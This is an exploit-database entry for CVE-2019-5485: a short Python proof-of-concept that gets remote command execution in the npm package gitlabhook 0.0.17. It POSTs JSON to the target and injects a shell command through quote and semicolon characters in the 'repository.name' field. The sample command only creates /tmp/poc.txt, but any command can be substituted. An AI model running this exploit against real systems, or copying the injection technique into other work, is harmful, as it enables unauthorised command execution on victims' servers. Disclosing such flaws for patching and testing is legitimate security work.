id: 33279
date: 09/26/2019
title: NPMJS gitlabhook 0.0.17 - (repository) Remote Command Execution Exploit
author: Semen Alexandrovich Lyhin
cves: CVE-2019-5485

# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10. 
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."

#  0day.today [2023-03-26]  #